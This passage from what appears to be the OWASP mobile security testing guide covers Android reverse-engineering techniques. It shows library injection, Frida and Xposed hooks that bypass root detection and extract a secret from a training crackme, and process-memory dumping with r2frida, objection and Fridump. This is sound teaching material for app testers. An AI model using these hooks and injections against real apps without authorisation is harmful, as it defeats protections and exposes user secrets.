adb install UnCrackable-Repackaged.apk\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0040/","title":"Waiting for the Debugger","text":"The UnCrackable App for Android Level 1 is not stupid: it notices that it has been run in debuggable mode and reacts by shutting down. A modal dialog is shown immediately, and the crackme terminates once you tap \"OK\".
Fortunately, Android's \"Developer options\" contain the useful \"Wait for Debugger\" feature, which allows you to automatically suspend an app during startup until a JDWP debugger connects. With this feature, you can connect the debugger before the detection mechanism runs, and trace, debug, and deactivate that mechanism. It's really an unfair advantage, but, on the other hand, reverse engineers never play fair!
In the Developer options, pick Uncrackable1
as the debugging application and activate the \"Wait for Debugger\" switch.
Note: Even with ro.debuggable
set to \"1\" in default.prop
, an app won't show up in the \"debug app\" list unless the android:debuggable
flag is set to \"true\"
in the Android Manifest.
In the previous section we learned about patching application code to assist in our analysis, but this approach has several limitations. For instance, you'd like to log everything that's being sent over the network without having to perform a MITM attack. For this you'd have to patch all possible calls to the network APIs, which can quickly become impractical when dealing with large applications. In addition, the fact that patching is unique to each application can also be considered a shortcoming, as this code cannot be easily reused.
Using library injection you can develop reusable libraries and inject them to different applications, effectively making them behave differently without having to modify their original source code. This is known as DLL injection on Windows (broadly used to modify and bypass anti-cheat mechanisms in games), LD_PRELOAD
on Linux and DYLD_INSERT_LIBRARIES
on macOS. On Android and iOS, a common example is using the Frida Gadget whenever Frida's so-called Injected mode of operation isn\u2019t suitable (i.e. you cannot run the Frida server on the target device). In this situation, you can inject the Gadget library by using the same methods you're going to learn in this section.
Library injection is desirable in many situations such as:
In this section, we will learn about techniques for performing library injection on Android, which basically consist of patching the application code (smali or native) or alternatively using the LD_PRELOAD
feature provided by the OS loader itself.
An Android application's decompiled smali code can be patched to introduce a call to System.loadLibrary
. The following smali patch injects a library named libinject.so:
const-string v0, \"inject\"\ninvoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V\n
Ideally you should insert the above code early in the application lifecycle, for instance in the onCreate
method. It is important to remember to add the library libinject.so in the respective architecture folder (armeabi-v7a, arm64-v8a, x86) of the lib
folder in the APK. Finally, you need to re-sign the application before using it.
A well-known use case of this technique is loading the Frida gadget to an application, especially while working on a non-rooted device (this is what objection patchapk
basically does).
Many Android applications use native code in addition to Java code for various performance and security reasons. The native code is present in the form of ELF shared libraries. An ELF executable includes a list of shared libraries (dependencies) that are linked to the executable for it to function optimally. This list can be modified to insert an additional library to be injected into the process.
Modifying the ELF file structure manually to inject a library can be cumbersome and prone to errors. However, this task can be performed with relative ease using LIEF (Library to Instrument Executable Formats). Using it requires only a few lines of Python code as shown below:
import lief\n\nlibnative = lief.parse(\"libnative.so\")\nlibnative.add_library(\"libinject.so\") # Injection!\nlibnative.write(\"libnative.so\")\n
In the above example, the libinject.so library is injected as a dependency of a native library (libnative.so), which the application already loads by default. Frida gadget can be injected into an application using this approach as explained in detail in LIEF's documentation. As in the previous section, it is important to remember to add the library to the respective architecture lib
folder in the APK and finally re-signing the application.
Above we looked into techniques which require some kind of modification of the application's code. A library can also be injected into a process using functionalities offered by the loader of the operating system. On Android, which is a Linux based OS, you can load an additional library by setting the LD_PRELOAD
environment variable.
As the ld.so man page states, symbols loaded from the library passed using LD_PRELOAD
always get precedence, i.e. they are searched first by the loader while resolving the symbols, effectively overriding the original ones. This feature is often used to inspect the input parameters of some commonly used libc functions such as fopen
, read
, write
, strcmp
, etc., especially in obfuscated programs, where understanding their behavior may be challenging. Therefore, having insight into which files are being opened or which strings are being compared may be very valuable. The key idea here is \"function wrapping\", meaning that you cannot patch system calls such as libc's fopen
, but you can override (wrap) it including custom code that will, for instance, print the input parameters for you and still call the original fopen
remaining transparent to the caller.
On Android, setting LD_PRELOAD
is slightly different compared to other Linux distributions. If you recall from the \"Platform Overview\" section, every application in Android is forked from Zygote, which is started very early during the Android boot-up. Thus, setting LD_PRELOAD
on Zygote is not possible. As a workaround for this problem, Android supports the setprop
(set property) functionality. Below you can see an example for an application with package name com.foo.bar
(note the additional wrap.
prefix):
setprop wrap.com.foo.bar LD_PRELOAD=/data/local/tmp/libpreload.so\n
Please note that if the library to be preloaded does not have SELinux context assigned, from Android 5.0 (API level 21) onwards, you need to disable SELinux to make LD_PRELOAD
work, which may require root.
You can use the command Java
in the Frida CLI to access the Java runtime and retrieve information from the running app. Remember that, unlike Frida for iOS, in Android you need to wrap your code inside a Java.perform
function. Thus, it's more convenient to use Frida scripts to e.g. get a list of loaded Java classes and their corresponding methods and fields or for more complex information gathering or instrumentation. One such script is listed below. The script to list class's methods used below is available on Github.
// Get list of loaded Java classes and methods\n\n// Filename: java_class_listing.js\n\nJava.perform(function() {\n Java.enumerateLoadedClasses({\n onMatch: function(className) {\n console.log(className);\n describeJavaClass(className);\n },\n onComplete: function() {}\n });\n});\n\n// Get the methods and fields\nfunction describeJavaClass(className) {\n var jClass = Java.use(className);\n console.log(JSON.stringify({\n _name: className,\n _methods: Object.getOwnPropertyNames(jClass.__proto__).filter(function(m) {\n return !m.startsWith('$') // filter out Frida related special properties\n || m == 'class' || m == 'constructor' // optional\n }),\n _fields: jClass.class.getFields().map(function(f) {\n return( f.toString());\n })\n }, null, 2));\n}\n
After saving the script to a file called java_class_listing.js, you can tell Frida CLI to load it by using the flag -l
and inject it to the process ID specified by -p
.
frida -U -l java_class_listing.js -p <pid>\n\n// Output\n[Huawei Nexus 6P::sg.vantagepoint.helloworldjni]->\n...\n\ncom.scottyab.rootbeer.sample.MainActivity\n{\n \"_name\": \"com.scottyab.rootbeer.sample.MainActivity\",\n \"_methods\": [\n ...\n \"beerView\",\n \"checkRootImageViewList\",\n \"floatingActionButton\",\n \"infoDialog\",\n \"isRootedText\",\n \"isRootedTextDisclaimer\",\n \"mActivity\",\n \"GITHUB_LINK\"\n ],\n \"_fields\": [\n \"public static final int android.app.Activity.DEFAULT_KEYS_DIALER\",\n...\n
Given the verbosity of the output, the system classes can be filtered out programmatically to make output more readable and relevant to the use case.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0043/","title":"Method Hooking","text":""},{"location":"MASTG/techniques/android/MASTG-TECH-0043/#xposed","title":"Xposed","text":"Let's assume you're testing an app that's stubbornly quitting on your rooted device. You decompile the app and find the following highly suspect method:
package com.example.a.b\n\npublic static boolean c() {\n int v3 = 0;\n boolean v0 = false;\n\n String[] v1 = new String[]{\"/sbin/\", \"/system/bin/\", \"/system/xbin/\", \"/data/local/xbin/\",\n \"/data/local/bin/\", \"/system/sd/xbin/\", \"/system/bin/failsafe/\", \"/data/local/\"};\n\n int v2 = v1.length;\n\n for(int v3 = 0; v3 < v2; v3++) {\n if(new File(String.valueOf(v1[v3]) + \"su\").exists()) {\n v0 = true;\n return v0;\n }\n }\n\n return v0;\n}\n
This method iterates through a list of directories and returns true
(device rooted) if it finds the su
binary in any of them. Checks like this are easy to deactivate: all you have to do is replace the code with something that returns \"false\". Method hooking with an Xposed module is one way to do this (see \"Android Basic Security Testing\" for more details on Xposed installation and basics).
The method XposedHelpers.findAndHookMethod
allows you to override existing class methods. By inspecting the decompiled source code, you can find out that the method performing the check is c
. This method is located in the class com.example.a.b
. The following is an Xposed module that overrides the function so that it always returns false:
package com.awesome.pentestcompany;\n\nimport static de.robv.android.xposed.XposedHelpers.findAndHookMethod;\nimport de.robv.android.xposed.IXposedHookLoadPackage;\nimport de.robv.android.xposed.XposedBridge;\nimport de.robv.android.xposed.XC_MethodHook;\nimport de.robv.android.xposed.callbacks.XC_LoadPackage.LoadPackageParam;\n\npublic class DisableRootCheck implements IXposedHookLoadPackage {\n\n public void handleLoadPackage(final LoadPackageParam lpparam) throws Throwable {\n if (!lpparam.packageName.equals(\"com.example.targetapp\"))\n return;\n\n findAndHookMethod(\"com.example.a.b\", lpparam.classLoader, \"c\", new XC_MethodHook() {\n @Override\n\n protected void beforeHookedMethod(MethodHookParam param) throws Throwable {\n XposedBridge.log(\"Caught root check!\");\n param.setResult(false);\n }\n\n });\n }\n}\n
Just like regular Android apps, modules for Xposed are developed and deployed with Android Studio. For more details on writing, compiling, and installing Xposed modules, refer to the tutorial provided by its author, rovo89.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0043/#frida","title":"Frida","text":"We'll use Frida to solve the UnCrackable App for Android Level 1 and demonstrate how we can easily bypass root detection and extract secret data from the app.
When you start the crackme app on an emulator or a rooted device, you'll find that it presents a dialog box and exits as soon as you press \"OK\" because it detected root:
Let's see how we can prevent this.
The main method (decompiled with CFR) looks like this:
package sg.vantagepoint.uncrackable1;\n\nimport android.app.Activity;\nimport android.app.AlertDialog;\nimport android.content.Context;\nimport android.content.DialogInterface;\nimport android.os.Bundle;\nimport android.text.Editable;\nimport android.view.View;\nimport android.widget.EditText;\nimport sg.vantagepoint.a.b;\nimport sg.vantagepoint.a.c;\nimport sg.vantagepoint.uncrackable1.a;\n\npublic class MainActivity\nextends Activity {\n private void a(String string) {\n AlertDialog alertDialog = new AlertDialog.Builder((Context)this).create();\n alertDialog.setTitle((CharSequence)string);\n alertDialog.setMessage((CharSequence)\"This is unacceptable. The app is now going to exit.\");\n alertDialog.setButton(-3, (CharSequence)\"OK\", new DialogInterface.OnClickListener(){\n\n public void onClick(DialogInterface dialogInterface, int n) {\n System.exit((int)0);\n }\n });\n alertDialog.setCancelable(false);\n alertDialog.show();\n }\n\n protected void onCreate(Bundle bundle) {\n if (c.a() || c.b() || c.c()) {\n this.a(\"Root detected!\");\n }\n if (b.a(this.getApplicationContext())) {\n this.a(\"App is debuggable!\");\n }\n super.onCreate(bundle);\n this.setContentView(2130903040);\n }\n\n /*\n * Enabled aggressive block sorting\n */\n public void verify(View object) {\n object = ((EditText)this.findViewById(2130837505)).getText().toString();\n AlertDialog alertDialog = new AlertDialog.Builder((Context)this).create();\n if (a.a((String)object)) {\n alertDialog.setTitle((CharSequence)\"Success!\");\n object = \"This is the correct secret.\";\n } else {\n alertDialog.setTitle((CharSequence)\"Nope...\");\n object = \"That's not it. Try again.\";\n }\n alertDialog.setMessage((CharSequence)object);\n alertDialog.setButton(-3, (CharSequence)\"OK\", new DialogInterface.OnClickListener(){\n\n public void onClick(DialogInterface dialogInterface, int n) {\n dialogInterface.dismiss();\n }\n });\n alertDialog.show();\n }\n}\n
Notice the \"Root detected\" message in the onCreate
method and the various methods called in the preceding if
-statement (which perform the actual root checks). Also note the \"This is unacceptable...\" message from the first method of the class, private void a
. Obviously, this method displays the dialog box. There is an alertDialog.onClickListener
callback set in the setButton
method call, which closes the application via System.exit
after successful root detection. With Frida, you can prevent the app from exiting by hooking the MainActivity.a
method or the callback inside it. The example below shows how you can hook MainActivity.a
and prevent it from ending the application.
setImmediate(function() { //prevent timeout\n console.log(\"[*] Starting script\");\n\n Java.perform(function() {\n var mainActivity = Java.use(\"sg.vantagepoint.uncrackable1.MainActivity\");\n mainActivity.a.implementation = function(v) {\n console.log(\"[*] MainActivity.a called\");\n };\n console.log(\"[*] MainActivity.a modified\");\n\n });\n});\n
Wrap your code in the function setImmediate
to prevent timeouts (you may or may not need to do this), then call Java.perform
to use Frida's methods for dealing with Java. Afterwards retrieve a wrapper for MainActivity
class and overwrite its a
method. Unlike the original, the new version of a
just writes console output and doesn't exit the app. An alternative solution is to hook onClick
method of the OnClickListener
interface. You can overwrite the onClick
method and prevent it from ending the application with the System.exit
call. If you want to inject your own Frida script, it should either disable the AlertDialog
entirely or change the behavior of the onClick
method so the app does not exit when you click \"OK\".
Save the above script as uncrackable1.js
and load it:
frida -U -f owasp.mstg.uncrackable1 -l uncrackable1.js --no-pause\n
After you see the \"MainActivity.a modified\" message, the app will not exit anymore.
You can now try to input a \"secret string\". But where do you get it?
If you look at the class sg.vantagepoint.uncrackable1.a
, you can see the encrypted string with which your input gets compared:
package sg.vantagepoint.uncrackable1;\n\nimport android.util.Base64;\nimport android.util.Log;\n\npublic class a {\n public static boolean a(String string) {\n\n byte[] arrby = Base64.decode((String)\"5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc=\", (int)0);\n\n try {\n arrby = sg.vantagepoint.a.a.a(a.b(\"8d127684cbc37c17616d806cf50473cc\"), arrby);\n }\n catch (Exception exception) {\n StringBuilder stringBuilder = new StringBuilder();\n stringBuilder.append(\"AES error:\");\n stringBuilder.append(exception.getMessage());\n Log.d((String)\"CodeCheck\", (String)stringBuilder.toString());\n arrby = new byte[]{};\n }\n return string.equals((Object)new String(arrby));\n }\n\n public static byte[] b(String string) {\n int n = string.length();\n byte[] arrby = new byte[n / 2];\n for (int i = 0; i < n; i += 2) {\n arrby[i / 2] = (byte)((Character.digit((char)string.charAt(i), (int)16) << 4) + Character.digit((char)string.charAt(i + 1), (int)16));\n }\n return arrby;\n }\n}\n
Look at the string.equals
comparison at the end of the a
method and the creation of the string arrby
in the try
block above. arrby
is the return value of the function sg.vantagepoint.a.a.a
. string.equals
comparison compares your input with arrby
. So we want the return value of sg.vantagepoint.a.a.a.
Instead of reversing the decryption routines to reconstruct the secret key, you can simply ignore all the decryption logic in the app and hook the sg.vantagepoint.a.a.a
function to catch its return value. Here is the complete script that prevents exiting on root and intercepts the decryption of the secret string:
setImmediate(function() { //prevent timeout\n console.log(\"[*] Starting script\");\n\n Java.perform(function() {\n var mainActivity = Java.use(\"sg.vantagepoint.uncrackable1.MainActivity\");\n mainActivity.a.implementation = function(v) {\n console.log(\"[*] MainActivity.a called\");\n };\n console.log(\"[*] MainActivity.a modified\");\n\n var aaClass = Java.use(\"sg.vantagepoint.a.a\");\n aaClass.a.implementation = function(arg1, arg2) {\n var retval = this.a(arg1, arg2);\n var password = '';\n for(var i = 0; i < retval.length; i++) {\n password += String.fromCharCode(retval[i]);\n }\n\n console.log(\"[*] Decrypted: \" + password);\n return retval;\n };\n console.log(\"[*] sg.vantagepoint.a.a.a modified\");\n });\n});\n
After running the script in Frida and seeing the \"[*] sg.vantagepoint.a.a.a modified\" message in the console, enter a random value for \"secret string\" and press verify. You should get an output similar to the following:
$ frida -U -f owasp.mstg.uncrackable1 -l uncrackable1.js --no-pause\n\n[*] Starting script\n[USB::Android Emulator 5554::sg.vantagepoint.uncrackable1]-> [*] MainActivity.a modified\n[*] sg.vantagepoint.a.a.a modified\n[*] MainActivity.a called.\n[*] Decrypted: I want to believe\n
The hooked function outputted the decrypted string. You extracted the secret string without having to dive too deep into the application code and its decryption routines.
You've now covered the basics of static/dynamic analysis on Android. Of course, the only way to really learn it is hands-on experience: build your own projects in Android Studio, observe how your code gets translated into bytecode and native code, and try to crack our challenges.
In the remaining sections, we'll introduce a few advanced subjects, including process exploration, kernel modules and dynamic execution.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0044/","title":"Process Exploration","text":"When testing an app, process exploration can provide the tester with deep insights into the app process memory. It can be achieved via runtime instrumentation and allows you to perform tasks such as:
As you can see, these passive tasks help us collect information. This information is often used for other techniques, such as method hooking.
In the following sections you will be using r2frida to retrieve information straight from the app runtime. Please refer to r2frida's official installation instructions. First start by opening an r2frida session to the target app (e.g. HelloWorld JNI APK) that should be running on your Android phone (connected per USB). Use the following command:
r2 frida://usb//sg.vantagepoint.helloworldjni\n
See all options with r2 frida://?
.
Once in the r2frida session, all commands start with :
. For example, in radare2 you'd run i
to display the binary information, but in r2frida you'd use :i
.
You can retrieve the app's memory maps by running \\dm
. The output in Android can get very long (e.g. between 1500 and 2000 lines), to narrow your search and see only what directly belongs to the app apply a grep (~
) by package name \\dm~<package_name>
:
[0x00000000]> \\dm~sg.vantagepoint.helloworldjni\n0x000000009b2dc000 - 0x000000009b361000 rw- /dev/ashmem/dalvik-/data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.art (deleted)\n0x000000009b361000 - 0x000000009b36e000 --- /dev/ashmem/dalvik-/data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.art (deleted)\n0x000000009b36e000 - 0x000000009b371000 rw- /dev/ashmem/dalvik-/data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.art (deleted)\n0x0000007d103be000 - 0x0000007d10686000 r-- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.vdex\n0x0000007d10dd0000 - 0x0000007d10dee000 r-- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\n0x0000007d10dee000 - 0x0000007d10e2b000 r-x /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\n0x0000007d10e3a000 - 0x0000007d10e3b000 r-- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\n0x0000007d10e3b000 - 0x0000007d10e3c000 rw- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\n0x0000007d1c499000 - 0x0000007d1c49a000 r-x /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c4a9000 - 0x0000007d1c4aa000 r-- /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c4aa000 - 0x0000007d1c4ab000 rw- /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c516000 - 0x0000007d1c54d000 r-- /data/app/sg.vantagepoint.helloworldjni-1/base.apk\n0x0000007dbd23c000 - 0x0000007dbd247000 r-- /data/app/sg.vantagepoint.helloworldjni-1/base.apk\n0x0000007dc05db000 - 0x0000007dc05dc000 r-- /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.art\n
While you're searching or exploring the app memory, you can always verify where you're located at each moment (where your current offset is located) in the memory map. Instead of noting and searching for the memory address in this list you can simply run \\dm.
. You'll find an example in the following section \"In-Memory Search\".
If you're only interested in the modules (binaries and libraries) that the app has loaded, you can use the command \\il
to list them all:
[0x00000000]> \\il\n0x000000558b1fd000 app_process64\n0x0000007dbc859000 libandroid_runtime.so\n0x0000007dbf5d7000 libbinder.so\n0x0000007dbff4d000 libcutils.so\n0x0000007dbfd13000 libhwbinder.so\n0x0000007dbea00000 liblog.so\n0x0000007dbcf17000 libnativeloader.so\n0x0000007dbf21c000 libutils.so\n0x0000007dbde4b000 libc++.so\n0x0000007dbe09b000 libc.so\n...\n0x0000007d10dd0000 base.odex\n0x0000007d1c499000 libnative-lib.so\n0x0000007d2354e000 frida-agent-64.so\n0x0000007dc065d000 linux-vdso.so.1\n0x0000007dc065f000 linker64\n
As you might expect you can correlate the addresses of the libraries with the memory maps: e.g. the native library of the app is located at 0x0000007d1c499000
and optimized dex (base.odex) at 0x0000007d10dd0000
.
You can also use objection to display the same information.
$ objection --gadget sg.vantagepoint.helloworldjni explore\n\nsg.vantagepoint.helloworldjni on (google: 8.1.0) [usb] # memory list modules\nSave the output by adding `--json modules.json` to this command\n\nName Base Size Path\n----------------------------------------------- ------------ -------------------- --------------------------------------------------------------------\napp_process64 0x558b1fd000 32768 (32.0 KiB) /system/bin/app_process64\nlibandroid_runtime.so 0x7dbc859000 1982464 (1.9 MiB) /system/lib64/libandroid_runtime.so\nlibbinder.so 0x7dbf5d7000 557056 (544.0 KiB) /system/lib64/libbinder.so\nlibcutils.so 0x7dbff4d000 77824 (76.0 KiB) /system/lib64/libcutils.so\nlibhwbinder.so 0x7dbfd13000 163840 (160.0 KiB) /system/lib64/libhwbinder.so\nbase.odex 0x7d10dd0000 442368 (432.0 KiB) /data/app/sg.vantagepoint.helloworldjni-1/oat/arm64/base.odex\nlibnative-lib.so 0x7d1c499000 73728 (72.0 KiB) /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n
You can even directly see the size and the path to that binary in the Android file system.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0044/#in-memory-search","title":"In-Memory Search","text":"In-memory search is a very useful technique to test for sensitive data that might be present in the app memory.
See r2frida's help on the search command (\\/?
) to learn about the search command and get a list of options. The following shows only a subset of them:
[0x00000000]> \\/?\n / search\n /j search json\n /w search wide\n /wj search wide json\n /x search hex\n /xj search hex json\n...\n
You can adjust your search by using the search settings \\e~search
. For example, \\e search.quiet=true;
will print only the results and hide search progress:
[0x00000000]> \\e~search\ne search.in=perm:r--\ne search.quiet=false\n
For now, we'll continue with the defaults and concentrate on string search. This app is actually very simple, it loads the string \"Hello from C++\" from its native library and displays it to us. You can start by searching for \"Hello\" and see what r2frida finds:
[0x00000000]> \\/ Hello\nSearching 5 bytes: 48 65 6c 6c 6f\n...\nhits: 11\n0x13125398 hit0_0 HelloWorldJNI\n0x13126b90 hit0_1 Hello World!\n0x1312e220 hit0_2 Hello from C++\n0x70654ec5 hit0_3 Hello\n0x7d1c499560 hit0_4 Hello from C++\n0x7d1c4a9560 hit0_5 Hello from C++\n0x7d1c51cef9 hit0_6 HelloWorldJNI\n0x7d30ba11bc hit0_7 Hello World!\n0x7d39cd796b hit0_8 Hello.java\n0x7d39d2024d hit0_9 Hello;\n0x7d3aa4d274 hit0_10 Hello\n
Now you'd like to know where these addresses actually are. You may do so by running the \\dm.
command for all @@
hits matching the glob hit0_*
:
[0x00000000]> \\dm.@@ hit0_*\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x00000000703c2000 - 0x00000000709b5000 rw- /data/dalvik-cache/arm64/system@framework@boot-framework.art\n0x0000007d1c499000 - 0x0000007d1c49a000 r-x /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c4a9000 - 0x0000007d1c4aa000 r-- /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64/libnative-lib.so\n0x0000007d1c516000 - 0x0000007d1c54d000 r-- /data/app/sg.vantagepoint.helloworldjni-1/base.apk\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n0x0000007d396bc000 - 0x0000007d3a998000 r-- /system/framework/arm64/boot-framework.vdex\n0x0000007d396bc000 - 0x0000007d3a998000 r-- /system/framework/arm64/boot-framework.vdex\n0x0000007d3a998000 - 0x0000007d3aa9c000 r-- /system/framework/arm64/boot-ext.vdex\n
Additionally, you can search for occurrences of the wide version of the string (\\/w
) and, again, check their memory regions:
[0x00000000]> \\/w Hello\nSearching 10 bytes: 48 00 65 00 6c 00 6c 00 6f 00\nhits: 6\n0x13102acc hit1_0 480065006c006c006f00\n0x13102b9c hit1_1 480065006c006c006f00\n0x7d30a53aa0 hit1_2 480065006c006c006f00\n0x7d30a872b0 hit1_3 480065006c006c006f00\n0x7d30bb9568 hit1_4 480065006c006c006f00\n0x7d30bb9a68 hit1_5 480065006c006c006f00\n\n[0x00000000]> \\dm.@@ hit1_*\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x0000000013100000 - 0x0000000013140000 rw- /dev/ashmem/dalvik-main space (region space) (deleted)\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n0x0000007d30a00000 - 0x0000007d30c00000 rw-\n
They are in the same rw- region as one of the previous strings (0x0000007d30a00000
). Note that searching for the wide versions of strings is sometimes the only way to find them as you'll see in the following section.
In-memory search can be very useful to quickly know if certain data is located in the main app binary, inside a shared library or in another region. You may also use it to test the behavior of the app regarding how the data is kept in memory. For instance, you could analyze an app that performs a login and search for occurrences of the user password. Also, you may check if you still can find the password in memory after the login is completed to verify if this sensitive data is wiped from memory after its use.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0044/#memory-dump","title":"Memory Dump","text":"You can dump the app's process memory with objection and Fridump. To take advantage of these tools on a non-rooted device, the Android app must be repackaged with frida-gadget.so
and re-signed. A detailed explanation of this process is in the section Dynamic Analysis on Non-Rooted Devices. To use these tools on a rooted phone, simply have frida-server installed and running.
Note: When using these tools, you might get several memory access violation errors which can normally be ignored. These tools inject a Frida agent and try to dump all the mapped memory of the app regardless of the access permissions (read/write/execute). Therefore, when the injected Frida agent tries to read a region that's not readable, it'll return the corresponding memory access violation errors. Refer to previous section \"Memory Maps and Inspection\" for more details.
With objection it is possible to dump all memory of the running process on the device by using the command memory dump all
.
$ objection --gadget sg.vantagepoint.helloworldjni explore\n\nsg.vantagepoint.helloworldjni on (google: 8.1.0) [usb] # memory dump all /Users/foo/memory_Android/memory\n\nWill dump 719 rw- images, totalling 1.6 GiB\nDumping 1002.8 MiB from base: 0x14140000 [------------------------------------] 0% 00:11:03(session detach message) process-terminated\nDumping 8.0 MiB from base: 0x7fc753e000 [####################################] 100%\nMemory dumped to file: /Users/foo/memory_Android/memory\n
In this case there was an error, which is probably due to memory access violations as we already anticipated. This error can be safely ignored as long as we are able to see the extracted dump in the file system. If you have any problems, a first step would be to enable the debug flag -d
when running objection or, if that doesn't help, file an issue in objection's GitHub.
Next, we are able to find the \"Hello from C++\" strings with radare2:
$ r2 /Users/foo/memory_Android/memory\n[0x00000000]> izz~Hello from\n1136 0x00065270 0x00065270 14 15 () ascii Hello from C++\n
Alternatively you can use Fridump. This time, we will input a string and see if we can find it in the memory dump. For this, open the MASTG Hacking Playground app, navigate to \"OMTG_DATAST_002_LOGGING\" and enter \"owasp-mstg\" to the password field. Next, run Fridump:
python3 fridump.py -U sg.vp.owasp_mobile.omtg_android -s\n\nCurrent Directory: /Users/foo/git/fridump\nOutput directory is set to: /Users/foo/git/fridump/dump\nStarting Memory dump...\nOops, memory access violation!-------------------------------] 0.28% Complete\nProgress: [##################################################] 99.58% Complete\nRunning strings on all files:\nProgress: [##################################################] 100.0% Complete\n\nFinished!\n
Tip: Enable verbosity by including the flag -v
if you want to see more details, e.g. the regions provoking memory access violations.
It will take a while until it's completed and you'll get a collection of *.data files inside the dump folder. When you add the -s
flag, all strings are extracted from the dumped raw memory files and added to the file strings.txt
, which is also stored in the dump directory.
ls dump/\ndump/1007943680_dump.data dump/357826560_dump.data dump/630456320_dump.data ... strings.txt\n
Finally, search for the input string in the dump directory:
$ grep -nri owasp-mstg dump/\nBinary file dump//316669952_dump.data matches\nBinary file dump//strings.txt matches\n
The \"owasp-mstg\" string can be found in one of the dump files as well as in the processed strings file.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0045/","title":"Runtime Reverse Engineering","text":"Runtime reverse engineering can be seen as the on-the-fly version of reverse engineering where you don't have the binary data to your host computer. Instead, you'll analyze it straight from the memory of the app.
We'll keep using the HelloWorld JNI app, open a session with r2frida r2 frida://usb//sg.vantagepoint.helloworldjni
and you can start by displaying the target binary information by using the :i
command:
[0x00000000]> :i\narch arm\nbits 64\nos linux\npid 13215\nuid 10096\nobjc false\nruntime V8\njava true\ncylang false\npageSize 4096\npointerSize 8\ncodeSigningPolicy optional\nisDebuggerAttached false\ncwd /\ndataDir /data/user/0/sg.vantagepoint.helloworldjni\ncodeCacheDir /data/user/0/sg.vantagepoint.helloworldjni/code_cache\nextCacheDir /storage/emulated/0/Android/data/sg.vantagepoint.helloworldjni/cache\nobbDir /storage/emulated/0/Android/obb/sg.vantagepoint.helloworldjni\nfilesDir /data/user/0/sg.vantagepoint.helloworldjni/files\nnoBackupDir /data/user/0/sg.vantagepoint.helloworldjni/no_backup\ncodePath /data/app/sg.vantagepoint.helloworldjni-1/base.apk\npackageName sg.vantagepoint.helloworldjni\nandroidId c92f43af46f5578d\ncacheDir /data/local/tmp\njniEnv 0x7d30a43c60\n
Search all symbols of a certain module with :is <lib>
, e.g. :is libnative-lib.so
.
[0x00000000]> \\is libnative-lib.so\n\n[0x00000000]>\n
These are empty in this case. Alternatively, you might prefer to look into the imports/exports. For example, list the imports with :ii <lib>
:
[0x00000000]> :ii libnative-lib.so\n0x7dbe1159d0 f __cxa_finalize /system/lib64/libc.so\n0x7dbe115868 f __cxa_atexit /system/lib64/libc.so\n
And list the exports with :iE <lib>
:
[0x00000000]> :iE libnative-lib.so\n0x7d1c49954c f Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI\n
For big binaries it's recommended to pipe the output to the internal less program by appending ~..
, i.e. \\ii libandroid_runtime.so~..
(if not, for this binary, you'd get almost 2500 lines printed to your terminal).
The next thing you might want to look at are the currently loaded Java classes:
[0x00000000]> \\ic~sg.vantagepoint.helloworldjni\nsg.vantagepoint.helloworldjni.MainActivity\n
List class fields:
[0x00000000]> :ic sg.vantagepoint.helloworldjni.MainActivity~sg.vantagepoint.helloworldjni\npublic native java.lang.String sg.vantagepoint.helloworldjni.MainActivity.stringFromJNI()\npublic sg.vantagepoint.helloworldjni.MainActivity()\n
Note that we've filtered by package name as this is the MainActivity
and it includes all methods from Android's Activity
class.
You can also display information about the class loader:
[0x00000000]> :icL\ndalvik.system.PathClassLoader[\n DexPathList[\n [\n directory \".\"]\n ,\n nativeLibraryDirectories=[\n /system/lib64,\n /vendor/lib64,\n /system/lib64,\n /vendor/lib64]\n ]\n ]\njava.lang.BootClassLoader@b1f1189dalvik.system.PathClassLoader[\n DexPathList[\n [\n zip file \"/data/app/sg.vantagepoint.helloworldjni-1/base.apk\"]\n ,\n nativeLibraryDirectories=[\n /data/app/sg.vantagepoint.helloworldjni-1/lib/arm64,\n /data/app/sg.vantagepoint.helloworldjni-1/base.apk!/lib/arm64-v8a,\n /system/lib64,\n /vendor/lib64]\n ]\n ]\n
Next, imagine that you are interested in the method exported by libnative-lib.so 0x7d1c49954c f Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI
. You can seek to that address with s 0x7d1c49954c
, analyze that function af
and print 10 lines of its disassembly pd 10
:
